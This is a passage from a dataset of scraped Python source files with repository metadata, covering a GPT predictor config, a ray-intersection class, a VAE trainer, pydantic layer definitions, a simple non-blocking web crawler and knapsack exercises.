'sequence_length': _APP_FLAGS.sequenceLength,
},
"model_config": {
"my_vocab_path": "oss://alg-misc/BERT/bert_pretrain/open_domain/gpt/mega_clue_vocab/clue-vocab.txt",
},
"predict_config": {
"predict_input_fp": None,
"predict_batch_size": 1,
"predict_output_fp": None
}
}
config_json["worker_hosts"] = FLAGS.worker_hosts
config_json["task_index"] = FLAGS.task_index
config_json["job_name"] = FLAGS.job_name
config_json["num_gpus"] = FLAGS.workerGPU
config_json["num_workers"] = FLAGS.workerCount
self.worker_hosts = str(config_json["worker_hosts"])
self.task_index = int(config_json["task_index"])
self.job_name = str(config_json["job_name"])
self.num_gpus = int(config_json["num_gpus"])
self.num_workers = int(config_json["num_workers"])
self.input_schema = config_json['preprocess_config']['input_schema']
self.label_name = config_json['preprocess_config'].get('label_name', None)
self.label_enumerate_values = config_json['preprocess_config'].get('label_enumerate_values', None)
self.output_schema = config_json['preprocess_config'].get('output_schema', None)
self.sequence_length = config_json['preprocess_config']['sequence_length']
self.first_sequence = config_json['preprocess_config']['first_sequence']
self.second_sequence = config_json['preprocess_config']['second_sequence']
self.vocab_file_path = config_json['model_config']['my_vocab_path']
self.predict_input_fp = config_json['predict_config']['predict_input_fp']
self.predict_output_fp = config_json['predict_config'].get('predict_output_fp', None)
self.predict_batch_size = config_json['predict_config']['predict_batch_size']
self.news_config = GroverConfig.from_json_file('oss://alg-misc/BERT/bert_pretrain/open_domain/gpt/mega_clue_vocab/mega.json')
self.ckpt_fn = "oss://alg-misc/BERT/bert_pretrain/open_domain/gpt/mega_clue_vocab/model.ckpt-220000"
app_config = GPTConfig()
predictor = AppPredictor(app_config,
thread_num=1,
queue_size=256,
job_name="app_predictor")
preprocessor = GPTPreprocessor(app_config,
thread_num=predictor.thread_num,
input_queue=queue.Queue(),
output_queue=queue.Queue())
postprocessor = GPTPostprocessor(app_config,
prediction_colname="predictions",
thread_num=predictor.thread_num,
input_queue=queue.Queue(),
output_queue=queue.Queue())
predictor.run_predict(reader=None,
preprocessor=preprocessor,
postprocessor=postprocessor,
writer=None)
| 448 | 3,700 | 46 |
ccd87448f7fcf54feb0817a1ca3ee00d9ad0bc89 | 1,930 | py | Python | order-1_voronoi/core/geometry/Ray.py | bzliu94/algorithms | 43ccefd7ea1fd88339bf2afa0b35b0a3bdf6acff | [
"MIT"
] | null | null | null | order-1_voronoi/core/geometry/Ray.py | bzliu94/algorithms | 43ccefd7ea1fd88339bf2afa0b35b0a3bdf6acff | [
"MIT"
] | null | null | null | order-1_voronoi/core/geometry/Ray.py | bzliu94/algorithms | 43ccefd7ea1fd88339bf2afa0b35b0a3bdf6acff | [
"MIT"
] | null | null | null | # constrained version of a line
# has direction
from Line import *
"""
ray1 = Ray((0, 0), (0, 1))
print ray1.getBase()
print ray1.getDirectionVector()
ray2 = Ray((1, 1), (-1, 0))
print ray1.doesIntersectWithRay(ray2)
print ray1.intersectWithRay(ray2)
"""
| 17.87037 | 96 | 0.646632 | # constrained version of a line
# has direction
from Line import *
class Ray:
def __init__(self, base, direction_vector):
self.base = base
self.direction_vector = direction_vector
self.line = Line(base, direction_vector)
def getBase(self):
return self.base
def setBase(self, base):
self.base = base
def getDirectionVector(self):
return self.direction_vector
def setDirectionVector(self, direction_vector):
self.direction_vector = direction_vector
def _getLine(self):
return self.line
def doesIntersectWithRay(self, ray, parameter_tolerance = 0.01):
line = self._getLine()
curr_line = ray._getLine()
lines_intersect = line.doesIntersectWithLine(curr_line)
if lines_intersect == False:
return False
else:
intersection_point = line.intersectWithLine(curr_line)
t = line.getParameterValue(intersection_point)
curr_t = curr_line.getParameterValue(intersection_point)
# print "t and current t:", t, curr_t
rays_intersect = t >= (-1 * parameter_tolerance) and curr_t >= (-1 * parameter_tolerance)
return rays_intersect
def intersectWithRay(self, ray):
"""
if self.doesIntersectWithRay(ray) == False:
raise Exception("rays do not intersect")
"""
line = self._getLine()
curr_line = ray._getLine()
intersection_point = line.intersectWithLine(curr_line)
return intersection_point
def toString(self):
base = self.getBase()
direction_vector = self.getDirectionVector()
result = str(base) + " " + str(direction_vector)
return result
"""
ray1 = Ray((0, 0), (0, 1))
print ray1.getBase()
print ray1.getDirectionVector()
ray2 = Ray((1, 1), (-1, 0))
print ray1.doesIntersectWithRay(ray2)
print ray1.intersectWithRay(ray2)
"""
| 1,090 | 526 | 24 |
8608d8cb73b28b9b1b106887d5308377e5628df2 | 6,738 | py | Python | tester/VAE_tester.py | y-x-c/electricauth | 1c223e9883b9e6382eabbf9a42629e471e039c4e | [
"MIT"
] | 1 | 2021-05-01T16:05:19.000Z | 2021-05-01T16:05:19.000Z | tester/VAE_tester.py | y-x-c/electricauth | 1c223e9883b9e6382eabbf9a42629e471e039c4e | [
"MIT"
] | null | null | null | tester/VAE_tester.py | y-x-c/electricauth | 1c223e9883b9e6382eabbf9a42629e471e039c4e | [
"MIT"
] | null | null | null | import torch
from torch import nn
import numpy as np
import pickle
import os
from model.VAE import VAE
from data.normalization import ChallengeNormalizer
from util.utils import iterate_minibatches
from util.cache import load_model, save_model
from config.general import cache_dir
| 35.277487 | 80 | 0.532057 | import torch
from torch import nn
import numpy as np
import pickle
import os
from model.VAE import VAE
from data.normalization import ChallengeNormalizer
from util.utils import iterate_minibatches
from util.cache import load_model, save_model
from config.general import cache_dir
class VAETester(object):
def __init__(self, X_train, y_train, X_val=None, y_val=None, gpu=None,
lr=1e-3, batchsize_train=2, batchsize_test=200,
epochs=50, verbose=False,
cache_name=None, load_trained=False, no_train=False,
n_latent_features=20,
n_hidden=400,
no_variational=False,
):
normalizer = ChallengeNormalizer(X_train, y_train)
self.normalizer = normalizer
net = VAE(input_length=X_train.shape[2],
n_sensor_channel=X_train.shape[1],
n_latent_features=n_latent_features,
n_hidden=n_hidden,
no_variational=no_variational)
self.net = net
self.batchsize_test = batchsize_test
self.use_gpu = not gpu is None
if self.use_gpu:
torch.cuda.set_device(gpu)
net = net.cuda()
model_state_dict = load_model(cache_name, gpu) if load_trained else None
if model_state_dict:
self.net.load_state_dict(model_state_dict)
elif not no_train:
self.train(X_train, y_train, X_val, y_val, epochs=epochs, lr=lr,
batchsize_train=batchsize_train, batchsize_test=batchsize_test,
verbose=verbose)
if cache_name:
save_model(cache_name, net)
cache_path = os.path.join(cache_dir, cache_name + '.log')
with open(cache_path, 'wb') as f:
pickle.dump(dict(
train_loss=self.train_loss_list,
val_loss=self.val_loss_list,
lr=lr,
batchsize_train=batchsize_train,
epochs=epochs
), f)
if X_val is not None:
print('@last epoch, train loss {:4f}, val loss {:4f}'.format(
self.train_loss_list[-1], self.val_loss_list[-1]))
else:
print('@last epoch, train loss {:4f}'.format(
self.train_loss_list[-1]))
else:
raise RuntimeError('No trained model available and no_train=True')
def train(self, X_train, y_train, X_val, y_val, epochs, lr, batchsize_train,
batchsize_test, verbose):
normalizer = self.normalizer
X_train = normalizer.normalize(X_train, y_train)
if X_val is not None:
X_val = normalizer.normalize(X_val, y_val)
net = self.net
optimizer = torch.optim.Adam(net.parameters(), lr=lr)
criterion = nn.MSELoss()
self.train_loss_list = train_loss_list = []
self.val_loss_list = val_loss_list = []
for e in range(epochs):
net.train()
train_loss_epoch = 0.
val_loss_epoch = 0.
for batch in iterate_minibatches(inputs=X_train, targets=None,
batchsize=batchsize_train):
x = batch
inputs = torch.from_numpy(x)
if self.use_gpu:
inputs = inputs.cuda()
optimizer.zero_grad()
inputs = inputs.view(inputs.shape[0], -1)
outputs, mu, logvar = net(inputs)
loss = criterion(outputs, inputs)
train_loss_epoch += loss.item() * x.shape[0]
loss.backward()
optimizer.step()
train_loss_epoch /= X_train.shape[0]
train_loss_list.append(train_loss_epoch)
if X_val is not None:
net.eval()
with torch.no_grad():
for batch in iterate_minibatches(inputs=X_val,
targets=None, batchsize=batchsize_test):
x = batch
inputs = torch.from_numpy(x)
if self.use_gpu:
inputs = inputs.cuda()
inputs = inputs.view(inputs.shape[0], -1)
outputs, mu, logvar = net(inputs)
loss = criterion(outputs, inputs)
val_loss_epoch += loss.item() * x.shape[0]
val_loss_epoch /= X_val.shape[0]
val_loss_list.append(val_loss_epoch)
net.train()
if verbose:
print("Epoch: {}/{}...".format(e+1, epochs),
"Train Loss: {:.4f}...".format(train_loss_epoch),
"Val Loss: {:.4f}...".format(val_loss_epoch))
def test(self, X_test, y_test):
X_test = self.normalizer.normalize(X_test, y_test)
net = self.net
criterion = nn.MSELoss(reduction='none')
score_list = np.array([])
mu_list = None
logvar_list = None
reconstructed_list = None
net.eval()
with torch.no_grad():
for batch in iterate_minibatches(X_test, targets=None,
batchsize=self.batchsize_test, shuffle=False):
x = batch
inputs = torch.from_numpy(x)
if self.use_gpu:
inputs = inputs.cuda()
inputs = inputs.view(inputs.shape[0], -1)
outputs, mu, logvar = net(inputs)
loss = criterion(outputs, inputs)
loss = torch.mean(loss, dim=(1))
loss = loss.cpu().numpy()
score_list = np.concatenate([score_list, loss])
mu = mu.detach().cpu().numpy()
logvar = logvar.detach().cpu().numpy()
outputs = outputs.detach().cpu().numpy()
mu_list = np.concatenate([mu_list, mu]) \
if mu_list is not None else mu
logvar_list = np.concatenate([logvar_list, logvar]) \
if logvar_list is not None else logvar
reconstructed_list = \
np.concatenate([reconstructed_list, outputs]) \
if reconstructed_list is not None else outputs
reconstructed_list = reconstructed_list.reshape(X_test.shape)
reconstructed_list = self.normalizer.denormalize(
reconstructed_list, y_test)
return score_list, mu_list, logvar_list, reconstructed_list
| 6,346 | 3 | 108 |
f704f29d917dfbd51e439f0dd5292f602da50c6f | 8,655 | py | Python | modelci/experimental/model/model_structure.py | FerdinandZhong/ML-Model-CI | 90fa2de056dca05031f0787b96c520dc57dc664d | [
"Apache-2.0"
] | 170 | 2020-06-08T18:30:52.000Z | 2022-03-28T12:08:11.000Z | modelci/experimental/model/model_structure.py | FerdinandZhong/ML-Model-CI | 90fa2de056dca05031f0787b96c520dc57dc664d | [
"Apache-2.0"
] | 146 | 2020-06-14T18:56:27.000Z | 2022-02-27T21:15:59.000Z | modelci/experimental/model/model_structure.py | FerdinandZhong/ML-Model-CI | 90fa2de056dca05031f0787b96c520dc57dc664d | [
"Apache-2.0"
] | 36 | 2020-06-08T18:30:56.000Z | 2022-03-07T18:10:19.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Author: Li Yuanming
Email: yli056@e.ntu.edu.sg
Date: 1/27/2021
ML model structure definitions.
"""
import abc
import inspect
from enum import Enum
from typing import Optional, Union, Tuple, Dict, OrderedDict
from pydantic import BaseModel, PositiveInt, conint, PositiveFloat, Field, validator
from typing_extensions import Literal
class Operation(Enum):
"""
Operation enum to the layer or connection. There are three kinds of operations: ``'A'`` for add the specific
layer / connection, ``'D'`` for delete the specific layer / connection, ``M`` for modify the layer /
connection, and ``E`` for no operation.
"""
ADD = 'A'
DELETE = 'D'
MODIFY = 'M'
EMPTY = 'E'
class LayerType(Enum):
"""
Enum of the supported layer type. This is to hint which class of layer the provided data is converted to.
"""
LINEAR = 'torch.nn.Linear'
CONV_1D = 'torch.nn.Conv1d'
CONV_2D = 'torch.nn.Conv2d'
RELU = 'torch.nn.ReLU'
TANH = 'torch.nn.Tanh'
BN_1D = 'torch.nn.BatchNorm1d'
BN_2D = 'torch.nn.BatchNorm2d'
MP_1D = 'torch.nn.MaxPool1d'
MP_2D = 'torch.nn.MaxPool2d'
AAP_1D = 'torch.nn.AdaptiveAvgPool1d'
AAP_2D = 'torch.nn.AdaptiveAvgPool2d'
class ModelLayer(BaseModel, abc.ABC):
# noinspection PyUnresolvedReferences
"""
Layer of the model structure.
For layer attributes need to be set :code:`None`, use :code:`'null'` instead. This is for the reason of
updated parameters with value :code:`None` will be viewed as not set. So we take special care to the
desired :code:`None`, replacing it with :code:`'null'`.
Attributes:
op_ (Operation): Operation to the layer.
type_ (LayerType): Indicates the type of this layer. This field also provides hint for :class:`pydantic`
model conversion.
__required_type__ (LayerType): By overriding this attributes, we can use :meth:`check_layer_type` to
provide validation of the sub classes.
"""
op_: Operation
type_: LayerType
__required_type__: LayerType
@classmethod
def parse_layer_obj(cls, layer_obj):
"""
Parse from a ML layer object.
This function will inspect the required parameters to build the layer, and try to obtain its
parameter value from the layer object. The default parameter parser is python default
:code:`getattr`, which assume we can get the value from the same-named attribute of the
layer object.
For parameter cannot parsed with default parser, set a function with the format:
:code:`__{parameter_name}_parser__(layer_obj: Any) -> Any`.
Has the following signature:
Input Arguments:
* layer_obj : Any
The layer object to be parsed.
Return Arguments:
* Any
The parsed value of the given parameter.
TODO:
Signature checking for __{parameter_name}_parser__
"""
kwargs = {'op_': Operation.EMPTY, 'type_': cls.__required_type__}
signature = inspect.signature(layer_obj.__init__)
for param in signature.parameters:
parser = getattr(cls, f'__{param}_parser__', lambda obj: getattr(obj, param))
kwargs[param] = parser(layer_obj)
return cls(**kwargs)
@validator('type_')
def check_layer_type(cls, layer_type: LayerType) -> LayerType: # noqa
"""
Checks layer type value provided is the same as the required value.
This is to generate validator for check :code:`layer_type` field of subclasses of :class:`ModelLayer`.
"""
if layer_type != cls.__required_type__:
raise ValueError(f'Expected {cls.__required_type__} but got {layer_type}')
return layer_type
_LayerType = Union[Linear, Conv1d, Conv2d, ReLU, Tanh, BatchNorm1d, BatchNorm2d, MaxPool1d, MaxPool2d,
AdaptiveAvgPool1d, AdaptiveAvgPool2d]
class Structure(BaseModel):
# noinspection PyUnresolvedReferences
"""
Indicate a ML model structure using a graph data structure.
:attr:`layer` is the graph node, representing a layer of the model. :attr:`connection` is the graph edge,
representing which two layers are connected, and the directions of tensor pass.
Attributes:
layer (OrderedDict[str, _LayerType]): Layer mapping, the key is layer name, and the value is layer
attributes. See :class:`ModelLayer` for reference.
connection (Optional[Dict[str, Dict[str, Operation]]]): The connection (:attr:`connection`) maps
the starting layer name, to the ending layer name with a connection operation.
Examples::
>>> from collections import OrderedDict
>>> # add a nn.Linear layer named 'fc1' with in_features=1024, out_features=10
>>> layer_mapping = OrderedDict({
... 'fc1': LinearLayer(in_features=1024, out_features=10, type_=LayerType.LINEAR, op_=Operation.ADD),
... })
>>> # connection example for add connection from 'conv1' to 'fc1'
>>> connection_mapping = {'conv1': {'fc1': Operation.ADD}}
>>> struct = Structure(layer=layer_mapping, connection=connection_mapping)
>>> print(struct)
layer={'fc1': LinearLayer(in_features=1024, out_features=10, bias=None)}
connection={'conv1': {'fc1': <Operation.ADD: 'A'>}}
>>> # Other than using the model object, we can pass in a plain dictionary,
... # and utilize `Structure.parse_obj`.
>>> structure_data = {
... 'layer': {'fc': {'in_features': 1024, 'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'A'}},
... 'connection': {'conv1': {'fc1': 'A'}}
... }
>>> Structure.parse_obj(structure_data)
Structure(layer={'fc': LinearLayer(in_features=1024, out_features=10, bias=None)},
connection={'conv1': {'fc1': <Operation.ADD: 'A'>}})
"""
layer: OrderedDict[str, _LayerType] = Field(
default_factory=OrderedDict,
example={'fc': {'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'M'}}
)
connection: Optional[Dict[str, Dict[str, Operation]]] = Field(
default_factory=dict,
example={'conv1': {'fc1': 'A'}}
)
| 34.209486 | 115 | 0.669324 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Author: Li Yuanming
Email: yli056@e.ntu.edu.sg
Date: 1/27/2021
ML model structure definitions.
"""
import abc
import inspect
from enum import Enum
from typing import Optional, Union, Tuple, Dict, OrderedDict
from pydantic import BaseModel, PositiveInt, conint, PositiveFloat, Field, validator
from typing_extensions import Literal
class Operation(Enum):
"""
Operation enum to the layer or connection. There are three kinds of operations: ``'A'`` for add the specific
layer / connection, ``'D'`` for delete the specific layer / connection, ``M`` for modify the layer /
connection, and ``E`` for no operation.
"""
ADD = 'A'
DELETE = 'D'
MODIFY = 'M'
EMPTY = 'E'
class LayerType(Enum):
"""
Enum of the supported layer type. This is to hint which class of layer the provided data is converted to.
"""
LINEAR = 'torch.nn.Linear'
CONV_1D = 'torch.nn.Conv1d'
CONV_2D = 'torch.nn.Conv2d'
RELU = 'torch.nn.ReLU'
TANH = 'torch.nn.Tanh'
BN_1D = 'torch.nn.BatchNorm1d'
BN_2D = 'torch.nn.BatchNorm2d'
MP_1D = 'torch.nn.MaxPool1d'
MP_2D = 'torch.nn.MaxPool2d'
AAP_1D = 'torch.nn.AdaptiveAvgPool1d'
AAP_2D = 'torch.nn.AdaptiveAvgPool2d'
class ModelLayer(BaseModel, abc.ABC):
# noinspection PyUnresolvedReferences
"""
Layer of the model structure.
For layer attributes need to be set :code:`None`, use :code:`'null'` instead. This is for the reason of
updated parameters with value :code:`None` will be viewed as not set. So we take special care to the
desired :code:`None`, replacing it with :code:`'null'`.
Attributes:
op_ (Operation): Operation to the layer.
type_ (LayerType): Indicates the type of this layer. This field also provides hint for :class:`pydantic`
model conversion.
__required_type__ (LayerType): By overriding this attributes, we can use :meth:`check_layer_type` to
provide validation of the sub classes.
"""
op_: Operation
type_: LayerType
__required_type__: LayerType
@classmethod
def parse_layer_obj(cls, layer_obj):
"""
Parse from a ML layer object.
This function will inspect the required parameters to build the layer, and try to obtain its
parameter value from the layer object. The default parameter parser is python default
:code:`getattr`, which assume we can get the value from the same-named attribute of the
layer object.
For parameter cannot parsed with default parser, set a function with the format:
:code:`__{parameter_name}_parser__(layer_obj: Any) -> Any`.
Has the following signature:
Input Arguments:
* layer_obj : Any
The layer object to be parsed.
Return Arguments:
* Any
The parsed value of the given parameter.
TODO:
Signature checking for __{parameter_name}_parser__
"""
kwargs = {'op_': Operation.EMPTY, 'type_': cls.__required_type__}
signature = inspect.signature(layer_obj.__init__)
for param in signature.parameters:
parser = getattr(cls, f'__{param}_parser__', lambda obj: getattr(obj, param))
kwargs[param] = parser(layer_obj)
return cls(**kwargs)
@validator('type_')
def check_layer_type(cls, layer_type: LayerType) -> LayerType: # noqa
"""
Checks layer type value provided is the same as the required value.
This is to generate validator for check :code:`layer_type` field of subclasses of :class:`ModelLayer`.
"""
if layer_type != cls.__required_type__:
raise ValueError(f'Expected {cls.__required_type__} but got {layer_type}')
return layer_type
class Linear(ModelLayer):
in_features: Optional[PositiveInt]
out_features: Optional[PositiveInt]
bias: Optional[bool]
__required_type__ = LayerType.LINEAR
@staticmethod
def __bias_parser__(layer_obj):
return layer_obj.bias is not None
class _ConvNd(ModelLayer, abc.ABC):
in_channels: Optional[PositiveInt]
out_channels: Optional[PositiveInt]
kernel_size: Optional[Union[PositiveInt, Tuple[PositiveInt, ...]]]
stride: Optional[Union[PositiveInt, Tuple[PositiveInt, ...]]]
padding: Optional[Union[conint(ge=0), Tuple[conint(ge=0), ...]]]
dilation: Optional[Union[PositiveInt, Tuple[PositiveInt, ...]]]
groups: PositiveInt
bias: bool
padding_mode: Literal['zeros', 'reflect', 'replicate', 'circular']
@staticmethod
def __bias_parser__(layer_obj):
return layer_obj.bias is not None
class Conv1d(_ConvNd):
__required_type__ = LayerType.CONV_1D
class Conv2d(_ConvNd):
__required_type__ = LayerType.CONV_2D
class ReLU(ModelLayer):
inplace: Optional[bool]
__required_type__ = LayerType.RELU
class Tanh(ModelLayer):
__required_type__ = LayerType.TANH
class _BatchNorm(ModelLayer, abc.ABC):
num_features: Optional[PositiveInt]
eps: Optional[PositiveFloat]
momentum: Optional[Union[PositiveFloat, Literal['null']]]
affine: Optional[bool]
track_running_stats: Optional[bool]
class BatchNorm1d(_BatchNorm):
__required_type__ = LayerType.BN_1D
class BatchNorm2d(_BatchNorm):
__required_type__ = LayerType.BN_2D
class _MaxPool(ModelLayer, abc.ABC):
kernel_size: Union[PositiveInt, Tuple[PositiveInt, ...]]
stride: Optional[Union[PositiveInt, Tuple[PositiveInt, ...]]] = None
padding: Union[conint(ge=0), Tuple[conint(ge=0), ...]] = 0
dilation: Union[PositiveInt, Tuple[PositiveInt, ...]] = 1
return_indices: bool = False
ceil_mode: bool = False
class MaxPool1d(_MaxPool):
__required_type__ = LayerType.MP_1D
class MaxPool2d(_MaxPool):
__required_type__ = LayerType.MP_2D
class _AdaptiveAvgPool(ModelLayer, abc.ABC):
output_size: Union[PositiveInt, Tuple[PositiveInt, ...]]
class AdaptiveAvgPool1d(_AdaptiveAvgPool):
__required_type__ = LayerType.AAP_1D
class AdaptiveAvgPool2d(_AdaptiveAvgPool):
__required_type__ = LayerType.AAP_2D
_LayerType = Union[Linear, Conv1d, Conv2d, ReLU, Tanh, BatchNorm1d, BatchNorm2d, MaxPool1d, MaxPool2d,
AdaptiveAvgPool1d, AdaptiveAvgPool2d]
class Structure(BaseModel):
# noinspection PyUnresolvedReferences
"""
Indicate a ML model structure using a graph data structure.
:attr:`layer` is the graph node, representing a layer of the model. :attr:`connection` is the graph edge,
representing which two layers are connected, and the directions of tensor pass.
Attributes:
layer (OrderedDict[str, _LayerType]): Layer mapping, the key is layer name, and the value is layer
attributes. See :class:`ModelLayer` for reference.
connection (Optional[Dict[str, Dict[str, Operation]]]): The connection (:attr:`connection`) maps
the starting layer name, to the ending layer name with a connection operation.
Examples::
>>> from collections import OrderedDict
>>> # add a nn.Linear layer named 'fc1' with in_features=1024, out_features=10
>>> layer_mapping = OrderedDict({
... 'fc1': LinearLayer(in_features=1024, out_features=10, type_=LayerType.LINEAR, op_=Operation.ADD),
... })
>>> # connection example for add connection from 'conv1' to 'fc1'
>>> connection_mapping = {'conv1': {'fc1': Operation.ADD}}
>>> struct = Structure(layer=layer_mapping, connection=connection_mapping)
>>> print(struct)
layer={'fc1': LinearLayer(in_features=1024, out_features=10, bias=None)}
connection={'conv1': {'fc1': <Operation.ADD: 'A'>}}
>>> # Other than using the model object, we can pass in a plain dictionary,
... # and utilize `Structure.parse_obj`.
>>> structure_data = {
... 'layer': {'fc': {'in_features': 1024, 'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'A'}},
... 'connection': {'conv1': {'fc1': 'A'}}
... }
>>> Structure.parse_obj(structure_data)
Structure(layer={'fc': LinearLayer(in_features=1024, out_features=10, bias=None)},
connection={'conv1': {'fc1': <Operation.ADD: 'A'>}})
"""
layer: OrderedDict[str, _LayerType] = Field(
default_factory=OrderedDict,
example={'fc': {'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'M'}}
)
connection: Optional[Dict[str, Dict[str, Operation]]] = Field(
default_factory=dict,
example={'conv1': {'fc1': 'A'}}
)
| 104 | 1,864 | 345 |
b504e628f2cdcc4f38f3aade7b0ba05e7c24f2f0 | 1,646 | py | Python | A_Web_Crawler_With_asyncio_Coroutines/simple_epoll.py | czs0x55aa/500lines_homework | a67a144181afadae387e2889f5ae29565e76cdad | [
"MIT"
] | null | null | null | A_Web_Crawler_With_asyncio_Coroutines/simple_epoll.py | czs0x55aa/500lines_homework | a67a144181afadae387e2889f5ae29565e76cdad | [
"MIT"
] | null | null | null | A_Web_Crawler_With_asyncio_Coroutines/simple_epoll.py | czs0x55aa/500lines_homework | a67a144181afadae387e2889f5ae29565e76cdad | [
"MIT"
] | null | null | null | # coding=utf8
import socket
from selectors2 import DefaultSelector, EVENT_READ, EVENT_WRITE
import time
url = 'xkcd.com'
selector = DefaultSelector()
stopped = False
res = []
@log_time
loop()
| 25.323077 | 78 | 0.58627 | # coding=utf8
import socket
from selectors2 import DefaultSelector, EVENT_READ, EVENT_WRITE
import time
url = 'xkcd.com'
selector = DefaultSelector()
stopped = False
res = []
def log_time(func):
def wrapper(*args, **kw):
start_time = time.time()
func(*args, **kw)
print(time.time() - start_time)
return wrapper
class Crawler(object):
def __init__(self, url):
self.url = url
self.sock = None
self.response = b''
def fetch(self):
self.sock = socket.socket()
self.sock.setblocking(False)
try:
self.sock.connect((self.url, 80))
except IOError:
pass
selector.register(self.sock.fileno(), EVENT_WRITE, self.connected)
def connected(self, key, mask):
selector.unregister(key.fd)
request = 'GET {} HTTP/1.0\r\nHost: xkcd.com\r\n\r\n'.format(self.url)
self.sock.send(request.encode('ascii'))
selector.register(key.fd, EVENT_READ, self.read_response)
def read_response(self, key, mask):
response = ''
chunk = self.sock.recv(4096)
if chunk:
self.response += chunk
else:
selector.unregister(key.fd)
global res, stopped
res.append(self.response)
if len(res) >= 10:
stopped = True
@log_time
def loop():
for i in range(10):
crawler = Crawler(url)
crawler.fetch()
while not stopped:
events = selector.select()
for event_key, event_mask in events:
callback = event_key.data
callback(event_key, event_mask)
loop()
| 1,273 | 1 | 175 |
e3221b92d4c086b255ccba4f1681b82d8200ae10 | 111 | py | Python | plydata/tidy/__init__.py | has2k1/plydata | d9d022def44ade656fbb39c16d2f7fe45e9e96da | [
"BSD-3-Clause"
] | 247 | 2017-05-06T08:56:29.000Z | 2022-03-16T00:36:35.000Z | plydata/tidy/__init__.py | sthagen/plydata | 7ecbabaae8af68e9d9b094ba1830cf8008746eca | [
"BSD-3-Clause"
] | 28 | 2017-05-19T06:52:32.000Z | 2022-02-17T10:41:47.000Z | plydata/tidy/__init__.py | sthagen/plydata | 7ecbabaae8af68e9d9b094ba1830cf8008746eca | [
"BSD-3-Clause"
] | 14 | 2017-05-14T11:47:16.000Z | 2020-11-20T18:07:49.000Z | from .tidy_verbs import * # noqa
from .. import _get_all_imports
__all__ = _get_all_imports(globals())
| 18.5 | 38 | 0.720721 | from .tidy_verbs import * # noqa
from .. import _get_all_imports
__all__ = _get_all_imports(globals())
| 0 | 0 | 0 |
b0d8d503d87f4c7477bf414c0a0b0d08d59bc8a0 | 321 | py | Python | SoftUni-Basic/conditional_statements/exercises/sum_seconds.py | Darkartt/SoftUni | 23d65ddb9f1e454c9b1338a60dc52f5a64c30bc9 | [
"MIT"
] | null | null | null | SoftUni-Basic/conditional_statements/exercises/sum_seconds.py | Darkartt/SoftUni | 23d65ddb9f1e454c9b1338a60dc52f5a64c30bc9 | [
"MIT"
] | null | null | null | SoftUni-Basic/conditional_statements/exercises/sum_seconds.py | Darkartt/SoftUni | 23d65ddb9f1e454c9b1338a60dc52f5a64c30bc9 | [
"MIT"
] | null | null | null | import math
time_first = int(input())
time_second = int(input())
time_third = int(input())
time_total = time_first + time_second + time_third
minutes = time_total / 60
seconds = time_total % 60
minutes = math.floor(minutes)
if seconds < 10:
print(f"{minutes}:0{seconds}")
else:
print(f"{minutes}:{seconds}") | 17.833333 | 50 | 0.694704 | import math
time_first = int(input())
time_second = int(input())
time_third = int(input())
time_total = time_first + time_second + time_third
minutes = time_total / 60
seconds = time_total % 60
minutes = math.floor(minutes)
if seconds < 10:
print(f"{minutes}:0{seconds}")
else:
print(f"{minutes}:{seconds}") | 0 | 0 | 0 |
1b497317ae49a6c90d84306a0a250f271b310138 | 1,103 | py | Python | arrays/knapsack.py | santoshmano/pybricks | bcb3ab80417e8e896280062494ce6c046329b7e8 | [
"MIT"
] | null | null | null | arrays/knapsack.py | santoshmano/pybricks | bcb3ab80417e8e896280062494ce6c046329b7e8 | [
"MIT"
] | null | null | null | arrays/knapsack.py | santoshmano/pybricks | bcb3ab80417e8e896280062494ce6c046329b7e8 | [
"MIT"
] | null | null | null |
"""
Problem below is i did not know what is the return,
return list of items or return maximum
def knapsack(items,
cur_items_index,
capacity,
weights,
profits,
cur_items,
cur_profit,
cur_weight,
max_items,
max_profit):
if (cur_items_index > len(items)-1) or \
cur_weight < capacity:
return
"""
print(knapsack([2, 3, 1, 4], [4, 5, 3, 7], 5))
print(knapsack_memo([2, 3, 1, 4], [4, 5, 3, 7], 5))
print(knapsack([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5))
print(knapsack_memo([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5))
| 19.017241 | 59 | 0.572983 |
"""
Problem below is i did not know what is the return,
return list of items or return maximum
def knapsack(items,
cur_items_index,
capacity,
weights,
profits,
cur_items,
cur_profit,
cur_weight,
max_items,
max_profit):
if (cur_items_index > len(items)-1) or \
cur_weight < capacity:
return
"""
def knapsack(w, p, c):
return _knapsack(w, p, c, 0)
def _knapsack(w, p, c, i):
if i >= len(w) or c <= 0:
return 0
p1 = p[i] + _knapsack(w, p, c-w[i], i+1)
p2 = _knapsack(w, p, c, i+1)
return max(p1, p2)
def knapsack_memo(w, p, c):
memo = [[None for _ in range(c+1)] for _ in range(len(w))]
return _knapsack_memo(w, p, c, 0, memo)
def _knapsack_memo(w, p, c, i, memo):
if i >= len(w) or c <= 0:
return 0
p1 = p[i] + _knapsack(w, p, c-w[i], i+1)
p2 = _knapsack(w, p, c, i+1)
memo[i][c] = max(p1, p2)
return memo[i][c]
print(knapsack([2, 3, 1, 4], [4, 5, 3, 7], 5))
print(knapsack_memo([2, 3, 1, 4], [4, 5, 3, 7], 5))
print(knapsack([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5))
print(knapsack_memo([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5))
| 448 | 0 | 92 |
9a86321bc99e59584ded292cf3d45149e72fc968 | 18 | py | Python | alphastarmini/core/rl/__init__.py | liuruoze/mini-AlphaStar | cf9de2507d526a5fb8ef67676aab2ffb92738640 | [
"Apache-2.0"
] | 108 | 2021-02-10T13:24:56.000Z | 2022-03-21T09:58:28.000Z | alphastarmini/core/rl/__init__.py | liuruoze/mini-AlphaStar | cf9de2507d526a5fb8ef67676aab2ffb92738640 | [
"Apache-2.0"
] | 21 | 2021-04-09T18:46:05.000Z | 2022-03-29T02:44:15.000Z | alphastarmini/core/rl/__init__.py | liuruoze/mini-AlphaStar | cf9de2507d526a5fb8ef67676aab2ffb92738640 | [
"Apache-2.0"
] | 19 | 2021-08-03T01:49:02.000Z | 2022-03-30T10:21:13.000Z | print("rl init")
| 9 | 17 | 0.611111 | print("rl init")
| 0 | 0 | 0 |
